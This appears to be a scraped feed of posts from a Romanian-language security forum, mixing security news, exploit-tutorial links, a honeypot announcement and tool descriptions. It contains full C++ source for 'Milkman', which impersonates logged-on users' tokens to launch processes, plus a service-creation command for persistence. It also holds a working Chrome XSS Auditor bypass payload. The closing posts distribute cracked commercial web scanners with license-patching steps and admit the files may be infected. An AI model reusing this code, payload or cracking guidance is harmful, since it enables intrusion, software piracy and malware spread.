Packet Storm Security Linux Exploit Writing Linux Exploit Writing Tutorial Part 1 Quote: [TABLE=width: 100%] [TR] [TD=class: alt2] This whitepaper is the Linux Exploit Writing Tutorial Part 1 - Stack Overflows. [/TD] [/TR] [/TABLE] Linux Exploit Writing Tutorial Part 2 Quote: [TABLE=width: 100%] [TR] [TD=class: alt2] This whitepaper is the Linux Exploit Writing Tutorial Part 2 - Stack Overflow ASLR bypass using ret2reg instruction from vulnerable_1. [/TD] [/TR] [/TABLE] Linux Exploit Writing Tutorial Part 3 Quote: [TABLE=width: 100%] [TR] [TD=class: alt2] This whitepaper is the Linux Exploit Writing Tutorial Part 3 - ret2libc. [/TD] [/TR] [/TABLE] Linux Exploit Development Part 2 Rev 2 Linux Exploit Writing Tutorial Part 3 Rev 2 Code: Linux Exploit Writing Tutorial Part 1 ? Packet Storm Linux Exploit Writing Tutorial Part 2 ? Packet Storm Linux Exploit Development Part 2 Rev 2 ? Packet Storm Linux Exploit Writing Tutorial Part 3 ? Packet Storm Linux Exploit Writing Tutorial Part 3 Revision 2 ? Packet Storm Sursa: EXETOOLS FORUM
-
Nu suntem hipsteri cu Apple. Bine, doar @aelius e .
-
Latest Firefox version adds protection against rogue SSL certificates
Nytro replied to Nytro's topic in Stiri securitate
E bun bre. SSL pinning = hardcoded RootCA/Server certificate. Asta inseamna ca previne Man in the Middle chiar si cu RootCA instalat local (telefon sau calculator). -
[h=1]Ropper – rop gadget finder and binary information tool [/h] With ropper you can show information about files in different file formats and you can search for gadgets to build rop chains for different architectures. For disassembly ropper uses the awesome Capstone Framework. Ropper was inspired by ROPgadget, but should be more than a gadgets finder. So it is possible to show information about a binary like header, segments, sections etc. Furthermore it is possible to edit the binaries and edit the header fields. Until now you can set the aslr and nx flags. usage: ropper.py [-h] [-v] [--console] [-f <file>] [-i] [-e] [--imagebase] [-c] [-s] [-S] [--imports] [--symbols] [--set <option>] [--unset <option>] [-I <imagebase>] [-p] [-j <reg>] [--depth <n bytes>] [--search <regex>] [--filter <regex>] [--opcode <opcode>] [--type <type>] With ropper you can show information about files in different file formats and you can search for gadgets to build rop chains for different architectures. supported filetypes: ELF PE supported architectures: x86 x86_64 MIPS optional arguments: -h, --help show this help message and exit -v, --version Print version --console Starts interactive commandline -f <file>, --file <file> The file to load -i, --info Shows file header [ELF/PE] -e Shows EntryPoint --imagebase Shows ImageBase [ELF/PE] -c, --dllcharacteristics Shows DllCharacteristics [PE] -s, --sections Shows file sections [ELF/PE] -S, --segments Shows file segments [ELF] --imports Shows imports [ELF/PE] --symbols Shows symbols [ELF] --set <option> Sets options. Available options: aslr nx --unset <option> Unsets options. Available options: aslr nx -I <imagebase> Uses this imagebase for gadgets -p, --ppr Searches for 'pop reg; pop reg; ret' instructions [only x86/x86_64] -j <reg>, --jmp <reg> Searches for 'jmp reg' instructions (-j reg[,reg...]) [only x86/x86_64] --depth <n bytes> Specifies the depth of search (default: 10) --search <regex> Searches for gadgets --filter <regex> Filters gadgets --opcode <opcode> Searches for opcodes --type <type> Sets the type of gadgets [rop, jop, all] (default: all) example uses: [Generic] ropper.py ropper.py --file /bin/ls --console [Informations] ropper.py --file /bin/ls --info ropper.py --file /bin/ls --imports ropper.py --file /bin/ls --sections ropper.py --file /bin/ls --segments ropper.py --file /bin/ls --set nx ropper.py --file /bin/ls --unset nx [Gadgets] ropper.py --file /bin/ls --depth 5 ropper.py --file /bin/ls --search "sub eax" ropper.py --file /bin/ls --filter "sub eax" ropper.py --file /bin/ls --opcode ffe4 ropper.py --file /bin/ls --type jop ropper.py --file /bin/ls --ppr ropper.py --file /bin/ls --jmp esp,eax ropper.py --file /bin/ls --type jop [h=2]Download[/h] https://github.com/sashs/Ropper (v1.0.1, 01.09.2014) Sursa: Ropper - rop gadget finder and binary information tool
-
The Chinese Underground In 2013 2:04 am (UTC-7) | by Lion Gu (Senior Threat Researcher) The Chinese underground has continued to grow since we last looked at it. It is still highly profitable, the cost of connectivity and hardware continues to fall, and there are more and more users with poor security precautions in place. In short, it is a good time to be a cybercriminal in China. So long as there is money to be made, more people may be tempted to become online crooks themselves. How can we measure the growth of the Chinese underground economy? We can look at the volume of their communications traffic. Many Chinese cybercriminals talk via groups on the popular Chinese instant messaging application QQ. We have been keeping an eye on these groups since March 2012. By the end of 2013, we had obtained 1.4 million publicly available messages from these groups. The data we gathered helped us determine certain characteristics and developing trends in the Chinese underground economy. First, the number of messages showed that the amount of underground activity in China doubled in the last 10 months of 2013 compared with the same period in 2012. Based on the ID of the senders, we also believe that the number of participants has also doubled in the same period. Cybercriminals are also going where the users are. Many of the malicious goods being sold in the underground economy are targeted at mobile users, as opposed to PC users. A mobile underground economy is emerging in China (something we noted earlier this year), and this part of the underground economy appears to be more attractive and lucrative than other portions. Our latest paper in the Cybercrime Underground Economy Series titled The Chinese Underground In 2013 contains the details of these findings related to QQ, as well as other updates dealing with the Chinese underground. Sursa: The Chinese Underground In 2013 | Security Intelligence Blog | Trend Micro
-
Latest Firefox version adds protection against rogue SSL certificates Firefox 32 has implemented a feature known as certificate key pinning By Jeremy Kirk | IDG News Service Mozilla has added a defense in its latest version of Firefox that would help prevent hackers from intercepting data intended for major online services. The feature, known as certificate key pinning, allows online services to specify which SSL/TLS (Secure Sockets Layer/Transport Security Layer) certificates are valid for their services. The certificates are used to verify a site is legitimate and to encrypt data traffic. The idea is to prevent attacks such as the one that affected Google in 2011, targeting Gmail users. A Dutch certificate authority (CA), Diginotar, was either tricked or hacked and issued a valid SSL certificate that would work for a Google domain. In theory, that allowed the hackers to set up a fake website that looked like Gmail and didn't trigger a browser warning of an invalid SSL certificate. Security experts have long warned that attacks targeting certificate authorities are a threat. Certificate pinning would have halted that kind of attack, as Firefox would have known Diginotar shouldn't have issued a certificate for Google. In Firefox 32, "if any certificate in the verified certificate chain corresponds to one of the known good (pinned) certificates, Firefox displays the lock icon as normal," wrote Sid Stamm, senior manager of security and privacy engineering at Mozilla, on a company blog. "When the root cert for a pinned site does not match one of the known good CAs, Firefox will reject the connection with a pinning error," he continued. The "pins" for the certificates of online services have to be encoded into Firefox. Firefox 32, released this week, supports Mozilla sites and Twitter. Later Firefox releases will support certificate pinning for Google sites, Tor, Dropbox and others, according to a project wiki. Sursa: Latest Firefox version adds protection against rogue SSL certificates | Applications - InfoWorld
-
Milkman: Creating Processes as Any Currently Logged in User One of the problems with using PSEXEC from Metasploit (any of the psexec modules) is that it runs as SYSTEM. What’s the problem with that? Isn’t SYSTEM god mode? Ya, and normally I’d agree that it’s the best level to have, but the defenses these days have gotten better, and getting direct connections out is pretty rare. That leaves proxies, and as you know SYSTEM doesn’t get any proxy settings. Here is a blog post that I made about setting the proxies for SYSTEM but leaving settings like this set is not only sloppy but hard to clean up. Along comes RunAsCurrentUser-2.0.3.1.exe I found this gem by messing up a search on google for RunAsUser. Found it on this IBM support post. Link to direct download: http://software.bigfix.com/download/bes/util/RunAsCurrentUser-2.0.3.1.exe Here is a mirror uploaded to my Post Exploitation repo: https://github.com/mubix/post-exploitation/blob/master/win32bins/RunAsCurrentUser-2.0.3.1.exe This binary takes a path to another executable as an argument. It then finds the currently logged in user and starts the provided executable as that user. AWESOME! This basically solves the whole PSEXEC->SYSTEM no-proxy settings issue. And it’s created by a legitimate company for legitimate reasons? w00tw00t. Game on! Only two problems: It is 335K, which doesn’t seem like much but over high latency lines that can take an eternity to transfer, especially over doubly encrypted channels like with a reverse_https meterpreter session. It takes an argument which normally isn’t a huge challenge, but in our specific use case, psexec modules in Metasploit, it isn’t something we can do easily. You would have to upload your C2 binary, as well as the 335K RunAsCurrentUser over to the target host, then run the psexec_command module to execute them both, one as the argument of the other. Kinda sloppy. So I set to try and figure out how this binary did it’s magic. As I’m not much of a reverse engineer I uploaded it to VirusTotal so I could take a look at it’s insides (plus, double check to see if it was being detected as malicious at all). As far as I can tell the important pieces are the Windows API calls ImpersonateLoggedOnUser, and CreateProcessAsUserA. I set to trying to reproduce what it did in AutoIT (awesome stuff if you have never checked it out). I couldn’t quite get the API calls right, so I decided to give C++ a shot. Turned out to be pretty simple. I present to you “Milkman”: https://gist.github.com/mubix/5d0cacdabfe092922fa3 (full source included below) This program (once compiled) takes one argument (or none at all) and runs calc.exe for every instance of the process you tell it to. If you run it without arguments it auto selects explorer.exe. So if you create a service: [TABLE] [TR] [TD=class: gutter]1 2[/TD] [TD=class: code]C:\temp\>sc create SuperService binpath= C:\Temp\milkman.exe type= own start= auto [sC] CreateService SUCCESS[/TD] [/TR] [/TABLE] It will start up every time the computer starts, which is completely useless, since there won’t be any users logged in at that point, but you get where this can go. Features to add to this at point are: Create a service binary that responds to START/STOP/PAUSE commands and such so that running this as a persistence method would actually be useful. Add a loop so that it continues to run checking for explorer.exe every so often so it can catch when someone is logged in. Finally the obvious one is to change it from being calc.exe that it runs by accepting another argument or some other kind of config option. Thoughts? What would you like Milkman to do, or what use case do you think a tweak would make it work better for? Leave a comment below. #ifndef UNICODE#define UNICODE #endif #include <Windows.h> #include <string.h> #include <stdio.h> #include <Psapi.h> void perror(DWORD nStatus) { LPVOID lpMsgBuf; FormatMessage( FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, NULL, nStatus, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR)&lpMsgBuf, 0, NULL); wprintf(L"[-] %6d %s\n", nStatus, lpMsgBuf); if (lpMsgBuf) { LocalFree(lpMsgBuf); } } int str_ends_with(TCHAR * str, TCHAR * suffix) { if (str == NULL || suffix == NULL) { return 0; } size_t str_len = wcslen(str); size_t suffix_len = wcslen(suffix); if (suffix_len > str_len) { return 0; } return 0 == wcscmp(str + str_len - suffix_len, suffix); } int start_process(int PID) { TCHAR cmd[512] = TEXT("calc.exe"); STARTUPINFO startup_info; PROCESS_INFORMATION process_information; SECURITY_IMPERSONATION_LEVEL impLevel = SecurityImpersonation; LPVOID pEnvironment; HANDLE hProc = NULL; HANDLE hToken = NULL; HANDLE hTokenDup = NULL; ZeroMemory(&startup_info, sizeof(startup_info)); startup_info.cb = sizeof(startup_info); ZeroMemory(&process_information, sizeof(process_information)); ZeroMemory(&pEnvironment, sizeof(pEnvironment)); hProc = OpenProcess(GENERIC_ALL, FALSE, PID); //perror(GetLastError()); OpenProcessToken(hProc, GENERIC_ALL, &hToken); //perror(GetLastError()); ImpersonateLoggedOnUser(hToken); //perror(GetLastError()); DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL, impLevel, TokenPrimary, &hTokenDup); //perror(GetLastError()); CreateProcessAsUser(hTokenDup, NULL, cmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, &pEnvironment, NULL, &startup_info, &process_information); //perror(GetLastError()); return 0; } int find(TCHAR *name) { //wprintf(TEXT("Looking for %s\n"), name); DWORD aProcesses[1024], cbNeeded, cProcesses; unsigned int i; HANDLE hProcessEnum; TCHAR szProcessName[MAX_PATH] = TEXT("<unknown>"); if (!EnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded)) { return 1; } cProcesses = cbNeeded / sizeof(DWORD); for (i = 0; i < cProcesses; i++) { if (aProcesses != 0) { hProcessEnum = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, aProcesses); if (NULL != hProcessEnum) { GetProcessImageFileName(hProcessEnum, szProcessName, sizeof(szProcessName) / sizeof(TCHAR)); if (str_ends_with(szProcessName, name)) { //wprintf(TEXT("[+] %d -\t%s\n"), aProcesses, szProcessName); start_process(aProcesses); } } } } return 0; } int wmain(int argc, TCHAR * argv[]) { if (argc > 1 && argv[1]) { find(argv[1]); //sperror(GetLastError()); } else { find(TEXT("explorer.exe")); //perror(GetLastError()); } return 0; } Posted by mubix Aug 14th, 2014 Sursa: Milkman: Creating processes as any currently logged in user - Room362.com
-
Google Chrome 31.0 XSS Auditor Bypass Authored by Rafay Baloch Google chrome XSS auditor was found prone to a bypass when the user input passed though location.hash was being written to the DOM by using document.write property. Normally, XSS auditor checks XSS by comparing the request and response however, it also checks for request itself, if it contains an untrusted input to prevent DOM XSS as well. #Vulnerability: Google Chrome 31.0 XSS Auditor Bypass #Impact: Moderate #Authors: Rafay Baloch #Company: RHAInfoSec #Website: http://rhainfosec.com <http://rhainfose.com/> #version: Latest Description Google chrome XSS auditor was found prone to a bypass when the user input passed though location.hash was being written to the DOM by using document.write property. Normally, XSS auditor checks XSS by comparing the request and response however, it also checks for request itself, if it contains an untrusted input to prevent DOM XSS as well. Proof Of concept: Consider the following code: <html> <body> <script type="text/javascript"> document.write(location.hash); </script> </body> </html> This takes input from location.hash property and writes it to the DOM. We initially inject the following payload: #<img src=x onerror=prompt(1)>. The request is blocked and the following error is returned: " The XSS Auditor refused to execute a script in 'attacker.com#><img src=x onerror=prompt(1)>' because its source code was found within the request. The auditor was enabled as the server sent neither an 'X-XSS-Protection' nor 'Content-Security-Policy' header." However, the following vector passes by: #<img src=x onerror=prompt(1)// The following is how its reflected inside of DOM: <img src="x" onerror="prompt(1)//" <="" body=""> Sursa: Google Chrome 31.0 XSS Auditor Bypass ? Packet Storm
-
[h=2]Bifrozt - A high interaction honeypot solution for Linux based systems.[/h]Tue, 09/02/2014 - 12:34 — are.hansen A few days ago I was contacted by our CPRO, Leon van der Eijk, and asked to write a blog post about my own project called Bifrozt; something which I was more than happy to do. This post will explain what Bifrozt is, how this got started, the overall status of the project and what will happen further down the road. What is Bifrozt? Generally speaking, Bifrozt is a NAT device with a DHCP server that is usually deployed with one NIC connected directly to the Internet and one NIC connected to the internal network. What differentiates Bifrozt from other standard NAT devices is its ability to work as a transparent SSHv2 proxy between an attacker and your honeypot. If you deployed a SSH server on Bifrozt's internal network it would log all the interaction to a TTY file in plain text that could be viewed later and capture a copy of any files that were downloaded. You would not have to install any additional software, compile any kernel modules or use a specific version or type of operating system on the internal SSH server for this to work. It will limit outbound traffic to a set number of ports and will start to drop outbound packets on these ports when certain limits are exceeded. How it started. Bifrozt is not something I can take full credit for, it depends on a awesome python project by Thomas Nicholson which I discovered in February 2014. Thomas had coded a SSH proxy called HonSSH and had taken inspiration and utilized code from the medium interaction Kippo honeypot. After I discovered HonSSH I decided to build an ISO file, that would allow me to install a pre-configured NAT device with HonSSH, on either a hardware or virtualized machine. I thought this would be a suitable project that I could occupy myself with during a 2 week holiday. Six months later and the project is still very much alive. Current status. Me and Thomas have been co-operating over the last five months to align our projects as much possible. Developing Bifrozt is much like building a car. Thomas is developing the engine (HonSSH) and making sure it's running smoothly, whilst I am developing the strong and solid frame (firewall, data extraction from log files, data control, system configuration etc etc) around it. Bifrozt has been in a proof of concept stage (Alpha) for the last six months. The current version, 0.0.8, has a relative humble feature list, but this is about to change. Bifrozt 0.0.8 -------------- - Intercept downloaded files - Logs all SSH communications to plain text file and TTY logs - Enforces data control - Facilitates data capture - Provides high level integrity of the captured data - Hardware installation - Virtual installation - Honeyd is pre-installed - Easy data extraction from logs - Disrupts outbound SYN flood attacks from the honeypot - Disrupts outbound UDP flood attacks from the honeypot - Compatible with amd64 architecture After after a few weeks of summer vacation I've started planning and testing the next release of Bifrozt. Bifrozt 0.0.9 -------------- - Compatible with x86 architecture - IDS (Snort or Suricata) - Viewing alerts and statistics trough a browser - Complete overhaul of the Python code - Multiple installation options to better suit the hardware resources and needs of the end user - Expand the current toolbox - Change base system from Ubuntu to Debian (not made any final decision about this yet) - Tool to generate DROP rules based on country of origin - Update and add more functions to bifrozt_stats (log data extraction) Roadmap for the future. No one knows what is going to happen down the road but, at the present time neither me or Thomas plan on abandoning our projects any time soon. We have both decided to create a road map for the future and he has allowed me to share them here, together with mine. Bifrozt roadmap. ------------------- Short term goals (Alpha stage): System: - Off line installation - Desktop environment (install option) - Optimizing IDS - Expand/improve web stats (optimize current, add HonSSH, create a dedicated start page) - HP feeds data sharing - Optimize firewall and data control Tools: - Simple static malware analysis (add VirusTotal upload function) - System re-configuration tool(s) (DHCP, SSH, firewall etc etc) - Develop new tools or adjust current to complement additional data captured by HonSSH Long term goals (Beta stage and beyond): - Provide a NAT device that provides reliant data capture of the most commonly used protocols - Quickly display data about the attacks, malware, outbound communication in a easy understandable format - To the extent of my abilities, make suer the project continues to be based on open source and freely available to anyone. HonSSH roadmap. --------------------- Short term: - Bring HonSSH out of proof-of-concept code into a more logical production format - Implement a bot to owner correlation technique using random passwords - Bug bashing Longer term: - Output data to ElasticSearch - Allow HTTP tunneling (currently disabled), parse HTTP outputs etc. - Parse X11 sessions - not sure if this will be worth it or not. - More consideration on data analysis (might be a separate project) HonSSH's current aim: - Parse, interpret and log all communications that travel through an SSH tunnel. Currently supports Terminal, Exec (and SCP) and SFTP traffic. HonSSH's current challenges: - Parsing the terminal - knowing what is a command, and what is program input e.g. nano etc. HonSSH's current questions: - Should HonSSH act on commands? e.g. When a wget command is detected, should it pull down the file (active), or should we use/develop another tool for passive packet capture/MITM of HTTP and IRC LINKS: Bifrozt HonSSH Sursa: https://www.honeynet.org/node/1191
-
RiskTool.Patcher HackTool[CrackTool:not-a-virus]/Win32.Patcher Win32:Patcher-AK [PUP] Riskware/GamePatcher PUA.HackTool.Patcher Majoritatea spun ca e "Patcher". E oarecum normal sa fie detectat, e un keygen.
-
Here is netsparker 3.5.3 Nu l-am incercat, nu stiu daca e infectat, executati pe proprie raspundere. Download: Download Crack rar I highly recommend that you use the cracks/patch after testing and download the apps trail versions from official websites and then use cracks on those. Sursa: https://www.opensc.ws/off-topic/19840-ibm-appscan-9-hp-webinspect-10-20-acunetix-9-5-a.html#post177138
-
Webinspect 10.20: download the application from official site itself. Nu l-am incercat, nu stiu daca e infectat, executati pe proprie raspundere. Download: https://download.hpsmartupdate.com/webinspect/ and crack here: Crack: hp webinspect crack.rar — RGhost — file sharing to crack copy WI8.exe and HPLicense.xml in installation folder double click WI8.exe first click on license and browse HPLicense.xml Then click on patch. Enjoy will be valid till 2020. Sursa: https://www.opensc.ws/off-topic/19840-ibm-appscan-9-hp-webinspect-10-20-acunetix-9-5-a.html#post177138
-
You can download trail version of appscan from their site by registering and downloading evaluation version. Otherwise you can download from here Nu l-am incercat, nu stiu daca e infectat, executati pe proprie raspundere. Download: ??? ??-qinxiaopeng456??? Download APPS_STD_EDI_9.0_WIN_ML_EVA .exe and LicenseProvider.dll Install appscan and then replace the LicenseProvider.dll in installation directory. Sursa: https://www.opensc.ws/off-topic/19840-ibm-appscan-9-hp-webinspect-10-20-acunetix-9-5-a.html#post177138
-
Audit Your Website Security with Acunetix Web Vulnerability Scanner As many as 70% of web sites have vulnerabilities that could lead to the theft of sensitive corporate data such as credit card information and customer lists. Hackers are concentrating their efforts on web-based applications - shopping carts, forms, login pages, dynamic content, etc. Accessible 24/7 from anywhere in the world, insecure web applications provide easy access to backend corporate databases. Nu l-am incercat, nu stiu daca e infectat, executati pe proprie raspundere: Download (cracked): Download Web Vul Scanner tar Sursa: https://www.opensc.ws/off-topic/19840-ibm-appscan-9-hp-webinspect-10-20-acunetix-9-5-a.html#post177138